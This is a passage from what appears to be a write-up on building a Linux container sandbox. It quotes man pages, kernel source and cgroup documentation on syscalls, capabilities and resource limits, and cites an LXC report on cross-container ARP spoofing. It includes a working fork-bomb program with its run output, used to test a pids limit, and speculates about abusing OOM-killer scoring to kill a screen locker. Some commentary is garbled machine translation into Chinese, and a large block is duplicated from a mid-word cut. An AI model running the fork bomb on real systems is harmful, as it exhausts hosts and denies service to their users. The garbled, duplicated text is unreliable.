	  to properly maintain and use.  The interface in /proc/sys
	  using paths with ascii names is now the primary path to this
	  information.

	  Almost nothing using the binary sysctl interface so if you are
	  trying to save some space it is probably safe to disable this,
	  making your kernel marginally smaller.

	  If unsure say N here.

man 2 alloc_hugepages

DESCRIPTION
	The system calls alloc_hugepages() and free_hugepages() were
	introduced  in Linux  2.5.36  and removed  again in  2.5.54.
	They  existed  only  on  i386  and  ia64  (when  built  with
	CONFIG_HUGETLB_PAGE).  In Linux  2.4.20, the syscall numbers
	exist, but the calls fail with the error ENOSYS.

man 2 bdflush

DESCRIPTION
	Note: Since  Linux 2.6, this  system call is  deprecated and
	does nothing.   It is  likely to  disappear altogether  in a
	future  kernel release.   Nowadays,  the  task performed  by
	bdflush() is handled by the kernel pdflush thread.

man 2 create_module

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

man 2 nfsservctl

NAME
	nfsservctl - syscall interface to kernel nfs daemon

SYNOPSIS
	#include <linux/nfsd/syscall.h>

	long nfsservctl(int cmd, struct nfsctl_arg *argp,
				 union nfsctl_res *resp);

DESCRIPTION
	Note: Since  Linux 3.1, this  system call no  longer exists.
	It  has  been  replaced  by  a set  of  files  in  the  nfsd
	filesystem; see nfsd(7).

man 2 syscalls

	perfctr(2)	2.2	Sparc; removed in 2.6.34

man 2 get_kernel_syms

GET_KERNEL_SYMS(2) -- 2016-10-08 -- Linux -- Linux Programmer's Manual

NAME
	get_kernel_syms  -  retrieve   exported  kernel  and  module
	symbols

SYNOPSIS
	#include <linux/module.h>

	int get_kernel_syms(struct kernel_sym *table);

	Note:  No declaration  of this  system call  is provided  in
	glibc headers; see NOTES.

DESCRIPTION
	Note: This  system call  is present  only in  kernels before
	Linux 2.6.

man 2 setup

SETUP(2) -- 2008-12-03 -- Linux -- Linux Programmer's Manual

NAME
	setup - setup devices and filesystems, mount root filesystem

	[...]

VERSIONS
	Since Linux 2.1.121, no such function exists anymore.

man 2 clock_settime is unfortunately pretty vague:

man 2 clock_settime

    CLOCK_GETRES(2) -- 2016-05-09 -- Linux Programmer's Manual

    NAME
            clock_getres, clock_gettime, clock_settime  - clock and time
            functions

            [...]

    ERRORS

            EFAULT
                    tp points outside the accessible address space.

            EINVAL
                    The clk_id specified is not supported on this system.

            EPERM
                    clock_settime()  does not  have permission  to set  the
                    clock indicated.

but you can see in the source that is the only clock with and set: CLOCK_REALTIME``.clock_set``.clock_adj

kernel/time/posix-timers.c:282@c8d2bc

    /*
     * Initialize everything, well, just everything in Posix clocks/timers ;)
     */
    static __init int init_posix_timers(void)
    {
            struct k_clock clock_realtime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_clock_realtime_get,
                    .clock_set      = posix_clock_realtime_set,
                    .clock_adj      = posix_clock_realtime_adj,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_ktime_get_ts,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic_raw = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_monotonic_raw,
            };
            struct k_clock clock_realtime_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_realtime_coarse,
            };
            struct k_clock clock_monotonic_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_monotonic_coarse,
            };
            struct k_clock clock_tai = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_tai,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_boottime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_boottime,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };

            posix_timers_register_clock(CLOCK_REALTIME, &clock_realtime);
            posix_timers_register_clock(CLOCK_MONOTONIC, &clock_monotonic);
            posix_timers_register_clock(CLOCK_MONOTONIC_RAW, &clock_monotonic_raw);
            posix_timers_register_clock(CLOCK_REALTIME_COARSE, &clock_realtime_coarse);
            posix_timers_register_clock(CLOCK_MONOTONIC_COARSE, &clock_monotonic_coarse);
            posix_timers_register_clock(CLOCK_BOOTTIME, &clock_boottime);
            posix_timers_register_clock(CLOCK_TAI, &clock_tai);

            posix_timers_cache = kmem_cache_create("posix_timers_cache",
                                            sizeof (struct k_itimer), 0, SLAB_PANIC,
                                            NULL);
            return 0;
    }

and that those methods go through and , which are both also gated by . settimeofday``adjtimex``CAP_SYS_TIME

kernel/time/posix-timers.c:212@c8d2bc

    /* Set clock_realtime */
    static int posix_clock_realtime_set(const clockid_t which_clock,
                                        const struct timespec *tp)
    {
            return do_sys_settimeofday(tp, NULL);
    }

    static int posix_clock_realtime_adj(const clockid_t which_clock,
                                        struct timex *t)
    {
            return do_adjtimex(t);
    }

security/commoncap.c:106@c8d2bc

    /**
     * cap_settime - Determine whether the current process may set the system clock
     * @ts: The time to set
     * @tz: The timezone to set
     *
     * Determine whether the current process may set the system clock and timezone
     * information, returning 0 if permission granted, -ve if denied.
     */
    int cap_settime(const struct timespec64 *ts, const struct timezone *tz)
    {
            if (!capable(CAP_SYS_TIME))
                    return -EPERM;
            return 0;
    }

kernel/time/ntp.c:657@c8d2bc

    /**
     * ntp_validate_timex - Ensures the timex is ok for use in do_adjtimex
     */
    int ntp_validate_timex(struct timex *txc)
    {
            if (txc->modes & ADJ_ADJTIME) {
                    /* singleshot must not be used with any other mode bits */
                    if (!(txc->modes & ADJ_OFFSET_SINGLESHOT))
                            return -EINVAL;
                    if (!(txc->modes & ADJ_OFFSET_READONLY) &&
                        !capable(CAP_SYS_TIME))
                            return -EPERM;
            } else {
                    /* In order to modify anything, you gotta be super-user! */
                     if (txc->modes && !capable(CAP_SYS_TIME))
                            return -EPERM;
                    /*
                     * if the quartz is off by more than 10% then
                     * something is VERY wrong!
                     */
                    if (txc->modes & ADJ_TICK &&
                        (txc->tick <  900000/USER_HZ ||
                         txc->tick > 1100000/USER_HZ))
                            return -EINVAL;
            }

            /* ... *
    }

man 3 adjtime

    ADJTIME(3) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

    NAME
            adjtime - correct the time to synchronize the system clock

            [...]

    ERRORS

            EINVAL
                    The adjustment in delta is outside the permitted range.

            EPERM
                    The caller does not have sufficient privilege to adjust
                    the time.  Under Linux,  the CAP_SYS_TIME capability is
                    required.

man 2 pciconfig_read

PCICONFIG_READ(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	pciconfig_read,  pciconfig_write,   pciconfig_iobase  -  pci
	device information handling
	[...]
ERRORS
	[...]
	EPERM
		User does not have  the CAP_SYS_ADMIN capability.  This
		does not apply to pciconfig_iobase().

Too many too list, but see man 2 quotactl.

man 2 ustat

    USTAT(2) -- 2003-08-04 -- Linux -- Linux Programmer's Manual

    NAME
            ustat - get filesystem statistics

    SYNOPSIS
            #include <sys/types.h>
            #include <unistd.h>    /* libc[45] */
            #include <ustat.h>     /* glibc2 */

            int ustat(dev_t dev, struct ustat *ubuf);

    DESCRIPTION
            ustat() returns information about a mounted filesystem.  dev
            is a device number identifying a device containing a mounted
            filesystem.  ubuf  is a  pointer to  a ustat  structure that
            contains the following members:

                daddr_t f_tfree;      /* Total free blocks */
                ino_t   f_tinode;     /* Number of free inodes */
                char    f_fname[6];   /* Filsys name */
                char    f_fpack[6];   /* Filsys pack name */

            The  last   two  fields,   f_fname  and  f_fpack,   are  not
            implemented  and  will  always  be filled  with  null  bytes
            ('\0').

man 2 sysfs

    SYSFS(2) -- 2010-06-27 -- Linux -- Linux Programmer's Manual

    NAME
            sysfs - get filesystem type information

    SYNOPSIS
            int sysfs(int option, const char *fsname);

            int sysfs(int option, unsigned int fs_index, char *buf);

            int sysfs(int option);

    DESCRIPTION
            sysfs()  returns  information  about  the  filesystem  types
            currently present in  the kernel.  The specific  form of the
            sysfs()  call and  the information  returned depends  on the
            option in effect:

            1  Translate the filesystem identifier  string fsname into a
               filesystem type index.

            2  Translate  the  filesystem  type index  fs_index  into  a
               null-terminated   filesystem  identifier   string.   This
               string will be  written to the buffer pointed  to by buf.
               Make sure that buf has enough space to accept the string.

            3  Return  the total  number of  filesystem types  currently
               present in the kernel.

            The  numbering of  the filesystem  type indexes  begins with
            zero.

man 2 uselib

USELIB(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	uselib - load shared library

	[..]

NOTES
	[...]

	Since Linux  3.15, this system  call is available  only when
	the kernel is configured with the CONFIG_USELIB option.

man 2 sync_file_range2

SYNC_FILE_RANGE(2) -- 2014-08-19 -- Linux -- Linux Programmer's Manual

NAME
	sync_file_range - sync a file segment with disk

	[...]
NOTES

   sync_file_range2()
	Some   architectures  (e.g.,   PowerPC,  ARM)   need  64-bit
	arguments to be aligned in a suitable pair of registers.  On
	such architectures, the  call signature of sync_file_range()
	shown in the SYNOPSIS would force a register to be wasted as
	padding  between   the  fd   and  offset   arguments.   (See
	syscall(2)  for  details.)  Therefore,  these  architectures
	define  a different  system call  that orders  the arguments
	suitably:

	    int sync_file_range2(int fd, unsigned int flags,
						off64_t offset, off64_t nbytes);

	The behavior  of this system  call is otherwise  exactly the
	same as sync_file_range().

man 2 readdir

READDIR(2) -- 2013-06-21 -- Linux -- Linux Programmer's Manual

NAME
	readdir - read directory entry

SYNOPSIS

	int readdir(unsigned int fd, struct old_linux_dirent *dirp,
			  unsigned int count);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	This is  not the  function you are  interested in.   Look at
	readdir(3)  for the  POSIX conforming  C library  interface.
	This page  documents the bare kernel  system call interface,
	which is superseded by getdents(2).

	readdir()  reads  one  old_linux_dirent structure  from  the
	directory referred  to by  the file  descriptor fd  into the
	buffer pointed to  by dirp.  The argument  count is ignored;
	at most one old_linux_dirent structure is read.

man 2 kexec_file_load

NAME
	kexec_load, kexec_file_load  - load  a new kernel  for later
	execution
	[...]
ERRORS
	[...]
	EPERM
		The caller does not have the CAP_SYS_BOOT capability.

man 2 nice

NICE(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	nice - change process priority

	[...]
ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

man 2 perfmonctl

PERFMONCTL(2) -- 2013-02-13 -- Linux -- Linux Programmer's Manual

NAME
	perfmonctl - interface to IA-64 performance monitoring unit

	[...]

CONFORMING TO
	perfmonctl() is Linux-specific and  is available only on the
	IA-64 architecture.

man 2 syscalls

	ppc_rtas(2)	2.6.2	PowerPC only

man 2 spu_create

SPU_CREATE(2) -- 2015-12-28 -- Linux -- Linux Programmer's Manual

NAME
	spu_create - create a new spu context

SYNOPSIS
	#include <sys/types.h>
	#include <sys/spu.h>

	int spu_create(const char *pathname, int flags, mode_t mode);
	int spu_create(const char *pathname, int flags, mode_t mode,
				int neighbor_fd);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The  spu_create() system  call is  used on  PowerPC machines
	that  implement the  Cell Broadband  Engine Architecture  in
	order  to access  Synergistic  Processor  Units (SPUs).   It
	creates a  new logical  context for an  SPU in  pathname and
	returns a file descriptor associated with it.  pathname must
	refer to a  nonexistent directory in the mount  point of the
	SPU filesystem  (spufs).  If  spu_create() is  successful, a
	directory is  created at pathname  and it is  populated with
	the files described in spufs(7).

man 2 spu_run

SPU_RUN(2) -- 2012-08-05 -- Linux -- Linux Programmer's Manual

NAME
	spu_run - execute an SPU context

SYNOPSIS
	#include <sys/spu.h>

	int spu_run(int fd, unsigned int *npc, unsigned int *event);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The spu_run() system  call is used on  PowerPC machines that
	implement the Cell Broadband Engine Architecture in order to
	access Synergistic Processor Units  (SPUs).  The fd argument
	is a  file descriptor returned by  spu_create(2) that refers
	to a specific SPU context.   When the context gets scheduled
	to a  physical SPU, it  starts execution at  the instruction
	pointer passed in npc.

man 2 subpage_prot

SUBPAGE_PROT(2) -- 2012-07-13 -- Linux -- Linux Programmer's Manual

NAME
	subpage_prot -  define a  subpage protection for  an address
	range

	[...]

VERSIONS
	This  system call  is provided  on the  PowerPC architecture
	since Linux 2.6.25.  The system call is provided only if the
	kernel is configured  with CONFIG_PPC_64K_PAGES.  No library
	support is provided.

man 2 syscalls

	utrap_install(2)	2.2	Sparc only

man 2 syscalls

	kern_features(2)	3.7	Sparc64

This is pretty vague, so I looked at the source. It’s only mentioned in an Sparc64-specific file:

arch/sparc/kernel/sys_sparc_64.c:648@c8d2bc

asmlinkage long sys_kern_features(void)
{
	return KERN_FEATURE_MIXED_MODE_STACK;
}

man 2 preadv2

DESCRIPTION
	The readv() system  call reads iovcnt buffers  from the file
	associated  with the  file  descriptor fd  into the  buffers
	described by iov ("scatter input").

	The  writev()  system call  writes  iovcnt  buffers of  data
	described  by  iov to  the  file  associated with  the  file
	descriptor fd ("gather output").

	[...]

	The readv() system call works  just like read(2) except that
	multiple buffers are filled.

	The  writev() system  call works  just like  write(2) except
	that multiple buffers are written out.

	[...]

   preadv() and pwritev()
	The  preadv()  system  call combines  the  functionality  of
	readv() and pread(2).  It performs the same task as readv(),
	but adds a fourth argument, offset, which specifies the file
	offset at which the input operation is to be performed.

	The  pwritev() system  call  combines  the functionality  of
	writev()  and  pwrite(2).   It  performs the  same  task  as
	writev(),  but   adds  a  fourth  argument,   offset,  which
	specifies the file  offset at which the  output operation is
	to be performed.

	The file offset  is not changed by these  system calls.  The
	file referred to by fd must be capable of seeking.

   preadv2() and pwritev2()

	These  system calls  are similar  to preadv()  and pwritev()
	calls, but add  a fifth argument, flags,  which modifies the
	behavior on a per-call basis.

	Unlike preadv() and pwritev(), if the offset argument is -1,
	then the current file offset is used and updated.

	The flags argument contains a bitwise  OR of zero or more of
	the following flags:

	RWF_DSYNC (since Linux 4.7)
		Provide a  per-write equivalent of the  O_DSYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

	RWF_HIPRI (since Linux 4.6)
		High    priority   read/write.     Allows   block-based
		filesystems  to  use  polling   of  the  device,  which
		provides   lower  latency,   but  may   use  additional
		resources.  (Currently, this feature  is usable only on
		a file descriptor opened using the O_DIRECT flag.)

	RWF_SYNC (since Linux 4.7)
		Provide a  per-write equivalent  of the  O_SYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

这不仅仅是一个拒绝服务问题。如果进程消耗内存很多，并且比其他一些得分更好关键主机端进程，主机端进程将被内核的内存不足杀手。badness

坏度分数有利于运行时间较长的进程，其中包括：

LWN 上的“驯服 OOM 杀手”：

选择要在内存不足情况下终止的进程基于其不良评分。坏评分反映在 /proc//oom_score。该值的确定依据是系统损失了完成的最小工作量，恢复了大量的工作内存量，不会杀死任何无辜的进程吃掉大量内存，并终止最少数量的进程（如果可能）仅限一个）。坏度评分是使用原始进程的内存大小、其 CPU 时间（utime + stime）、运行时间（正常运行时间 - 开始时间）及其oom_adj值。内存越大进程使用，分数越高。过程越长在系统中活着，分数越小。

我还没有证明它，但我相信这可以纵到例如，导致屏幕锁定程序被终止。事实并非如此闻所未闻的例如 xScreensaver 泄漏内存：

“gltext 似乎泄漏内存，最终导致 OOM-killer 运行”：

gltext 正在消耗大量内存。经常被杀死 oom-killer，但最终导致我无法登录我的计算机从可能的屏幕保护程序列表中禁用 GLText 导致问题消失。

甚至还有一个开放的 Ubuntu xscreensaver 错误，使 OOM 杀手更有可能杀死 xscreensaver。这似乎是错误的给我的方向…

“Xscreensaver 不保护系统免受其子项的攻击”：

问题是，屏幕保护程序并不是 系统。如果它是资源猪，它应该早死。你所拥有的一切要做的是将“10”写到 /proc/PID/oom_adj 中，Bob 就是你的叔叔。直到那么，Xscreensaver 就失职了。

man 7 cgroup_namespaces

	Cgroup namespaces virtualize the view of a process's cgroups
	(see   cgroups(7))  as   seen  via   /proc/[pid]/cgroup  and
	/proc/[pid]/mountinfo.

	Each  cgroup  namespace  has  its own  set  of  cgroup  root
	directories,  which are  the  base points  for the  relative
	locations displayed  in /proc/[pid]/cgroup.  When  a process
	creates a new cgroup  namespace using clone(2) or unshare(2)
	with  the  CLONE_NEWCGROUP  flag,  it enters  a  new  cgroup
	namespace in  which its  current cgroups  directories become
	the  cgroup root  directories of  the new  namespace.  (This
	applies both for  the cgroups version 1  hierarchies and the
	cgroups version 2 unified hierarchy.)

Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.limit_in_bytes		 # set/show limit of memory usage

Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.kmem.limit_in_bytes      # set/show hard limit for kernel memory

man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.

	cpu (since Linux 2.6.24; CONFIG_CGROUP_SCHED)
		Cgroups  can be  guaranteed  a minimum  number of  "CPU
		shares" when a  system is busy.  This does  not limit a
		cgroup's CPU usage if the CPUs are not busy.

		Further information  can be found in  the kernel source
		file Documentation/scheduler/sched-bwc.txt.

Documentation/cgroup-v1/pids.txt@c8d2bc

						   Process Number Controller
						   =========================

Abstract
--------

The process number controller is used to allow a cgroup hierarchy to stop any
new tasks from being fork()'d or clone()'d after a certain limit is reached.

Since it is trivial to hit the task limit without hitting any kmemcg limits in
place, PIDs are a fundamental resource. As such, PID exhaustion must be
preventable in the scope of a cgroup hierarchy by allowing resource limiting of
the number of tasks in a cgroup.

Usage
-----

In order to use the `pids` controller, set the maximum number of tasks in
pids.max (this is not available in the root cgroup for obvious reasons). The
number of processes currently in the cgroup is given by pids.current.

例如

forkbomb.c
/* -*- compile-command: "gcc -Wall -Werror -static forkbomb.c -o forkbomb" -*- */
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main (int argc, char  **argv)
{
   
	switch (fork()) {
   
	case -1:
		fprintf(stderr, "++ couldn't even fork once: %m\n");
		return 1;
	case 0:
		while (1) {
   
			switch (fork()) {
   
			case -1:
				break;
			case 0:
				fprintf(stderr, "++ successful fork.\n");
				break;
			default:
				break;
				
			}
		}
		break;
	default:
		while (1) sleep(1);
		break;
	}
	return 0;
}
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c forkbomb
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.0sOZgF...done.
=> trying a user namespace...writing /proc/2184/uid_map...writing /proc/2184/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
C-c C-c

Documentation/cgroup-v1/blkio-controller.txt@c8d2bc

Details of cgroup files
=======================
Proportional weight policy files
--------------------------------
- blkio.weight
	- Specifies per cgroup weight. This is default weight of the group
	  on all the devices until and unless overridden by per device rule.
	  (See blkio.weight_device).
	  Currently allowed range of weights is from 10 to 1000.

man 7 cgroups

   Creating cgroups and moving processes
	A cgroup filesystem initially contains a single root cgroup,
	'/', which all processes belong to.  A new cgroup is created
	by creating a directory in the cgroup filesystem:

	    mkdir /sys/fs/cgroup/cpu/cg1

	This creates a new empty cgroup.

	A process  may be moved  to this  cgroup by writing  its PID
	into the cgroup's cgroup.procs file:

	    echo $$ > /sys/fs/cgroup/cpu/cg1/cgroup.procs

	Only one PID at a time should be written to this file.

	Writing  the  value 0  to  a  cgroup.procs file  causes  the
	writing process to be moved to the corresponding cgroup.

	When writing a PID into the cgroup.procs, all threads in the
	process are moved into the new cgroup at once.

	Within a hierarchy, a process can be a member of exactly one
	cgroup.   Writing a  process's  PID to  a cgroup.procs  file
	automatically removes  it from  the cgroup  of which  it was
	previously a member.

	The cgroup.procs  file can be read  to obtain a list  of the
	processes that are  members of a cgroup.   The returned list
	of  PIDs is  not  guaranteed  to be  in  order.   Nor is  it
	guaranteed to  be free of  duplicates.  (For example,  a PID
	may be recycled while reading from the list.)

	In cgroups v1 (but not cgroups v2), an individual thread can
	be moved to  another cgroup by writing its  thread ID (i.e.,
	the kernel thread ID returned  by clone(2) and gettid(2)) to
	the tasks file in a cgroup directory.  This file can be read
	to  discover the  set of  threads  that are  members of  the
	cgroup.  This file is not present in cgroup v2 directories.

man 2 setrlimit

	The soft limit is the value that the kernel enforces for the
	corresponding resource.   The hard  limit acts as  a ceiling
	for the soft limit: an unprivileged process may set only its
	soft limit  to a value  in the range from  0 up to  the hard
	limit,  and   (irreversibly)  lower   its  hard   limit.   A
	privileged    process   (under    Linux:   one    with   the
	CAP_SYS_RESOURCE capability)  may make arbitrary  changes to
	either limit value.

Documentation/cgroup-v1/cgroups.txt@c8d2bc

1.4 What does notify_on_release do ?
------------------------------------

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.  This enables automatic
removal of abandoned cgroups.  The default value of
notify_on_release in the root cgroup at system boot is disabled
(0).  The default value of other cgroups at creation is the current
value of their parents' notify_on_release settings. The default value of
a cgroup hierarchy's release_agent path is empty.

基于每个容器设置脱模剂很烦人，所以我们会避免它。

“跨容器 ARP 中毒”，NCCGroup 的 Jesse Hertz 的 LXC 错误报告

Description:

An unprivileged LXC container can conduct an ARP spoofing attack
against another unprivileged LXC container running on the same
host. This allows man-in-the-middle attacks on another container's
traffic.

Recommendation:

Due to the complex nature of this involving the Linux bridge
interface, NCC is not aware of an easy fix. We suggest involving the
kernel networking team to allow for ARP restrictions on virtual bridge
interfaces. Using ebtables to block and control link layer traffic may
also be an effective fix. Documentation should reflect the risks of
not using any future protections or ebtables.

Stéphane Graber (stgraber) wrote on 2016-02-22:	#1
Hi,

Thanks for the report. This is not exactly news to us and has been
mentioned publicly a few times.

Our usual answer to this is that if you don't trust your users, you
shouldn't grant them access to a shared bridge, instead setup a
separate bridge for them.

MAC filtering through ebtables is an option but the problem with this
approach is that it essentially prevents container nesting as that
would lead to more than one MAC being used by the container which
ebtables would block.

[...]

On a local system, our answer to that is as I said to either trust
everyone you give access to a shared bridge or to segment traffic by
using multiple bridges.

man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.
[...]

	net_prio (since Linux 3.3; CONFIG_CGROUP_NET_PRIO)
		This  allows priorities  to be  specified, per  network
		interface, for cgroups.

		Further information  can be found in  the kernel source
		file Documentation/cgroup-v1/net_prio.txt.
vice rule.
	  (See blkio.weight_device).
	  Currently allowed range of weights is from 10 to 1000.

man 7 cgroups

   Creating cgroups and moving processes
	A cgroup filesystem initially contains a single root cgroup,
	'/', which all processes belong to.  A new cgroup is created
	by creating a directory in the cgroup filesystem:

	    mkdir /sys/fs/cgroup/cpu/cg1

	This creates a new empty cgroup.

	A process  may be moved  to this  cgroup by writing  its PID
	into the cgroup's cgroup.procs file:

	    echo $$ > /sys/fs/cgroup/cpu/cg1/cgroup.procs

	Only one PID at a time should be written to this file.

	Writing  the  value 0  to  a  cgroup.procs file  causes  the
	writing process to be moved to the corresponding cgroup.

	When writing a PID into the cgroup.procs, all threads in the
	process are moved into the new cgroup at once.

	Within a hierarchy, a process can be a member of exactly one
	cgroup.   Writing a  process's  PID to  a cgroup.procs  file
	automatically removes  it from  the cgroup  of which  it was
	previously a member.

	The cgroup.procs  file can be read  to obtain a list  of the
	processes that are  members of a cgroup.   The returned list
	of  PIDs is  not  guaranteed  to be  in  order.   Nor is  it
	guaranteed to  be free of  duplicates.  (For example,  a PID
	may be recycled while reading from the list.)

	In cgroups v1 (but not cgroups v2), an individual thread can
	be moved to  another cgroup by writing its  thread ID (i.e.,
	the kernel thread ID returned  by clone(2) and gettid(2)) to
	the tasks file in a cgroup directory.  This file can be read
	to  discover the  set of  threads  that are  members of  the
	cgroup.  This file is not present in cgroup v2 directories.

man 2 setrlimit

	The soft limit is the value that the kernel enforces for the
	corresponding resource.   The hard  limit acts as  a ceiling
	for the soft limit: an unprivileged process may set only its
	soft limit  to a value  in the range from  0 up to  the hard
	limit,  and   (irreversibly)  lower   its  hard   limit.   A
	privileged    process   (under    Linux:   one    with   the
	CAP_SYS_RESOURCE capability)  may make arbitrary  changes to
	either limit value.

Documentation/cgroup-v1/cgroups.txt@c8d2bc

1.4 What does notify_on_release do ?
------------------------------------

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.  This enables automatic
removal of abandoned cgroups.  The default value of
notify_on_release in the root cgroup at system boot is disabled
(0).  The default value of other cgroups at creation is the current
value of their parents' notify_on_release settings. The default value of
a cgroup hierarchy's release_agent path is empty.

基于每个容器设置脱模剂很烦人，所以我们会避免它。

“跨容器 ARP 中毒”，NCCGroup 的 Jesse Hertz 的 LXC 错误报告

Description:

An unprivileged LXC container can conduct an ARP spoofing attack
against another unprivileged LXC container running on the same
host. This allows man-in-the-middle attacks on another container's
traffic.

Recommendation:

Due to the complex nature of this involving the Linux bridge
interface, NCC is not aware of an easy fix. We suggest involving the
kernel networking team to allow for ARP restrictions on virtual bridge
interfaces. Using ebtables to block and control link layer traffic may
also be an effective fix. Documentation should reflect the risks of
not using any future protections or ebtables.

Stéphane Graber (stgraber) wrote on 2016-02-22:	#1
Hi,

Thanks for the report. This is not exactly news to us and has been
mentioned publicly a few times.

Our usual answer to this is that if you don't trust your users, you
shouldn't grant them access to a shared bridge, instead setup a
separate bridge for them.

MAC filtering through ebtables is an option but the problem with this
approach is that it essentially prevents container nesting as that
would lead to more than one MAC being used by the container which
ebtables would block.

[...]

On a local system, our answer to that is as I said to either trust
everyone you give access to a shared bridge or to segment traffic by
using multiple bridges.

man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.
[...]

	net_prio (since Linux 3.3; CONFIG_CGROUP_NET_PRIO)
		This  allows priorities  to be  specified, per  network
		interface, for cgroups.

		Further information  can be found in  the kernel source
		file Documentation/cgroup-v1/net_prio.txt.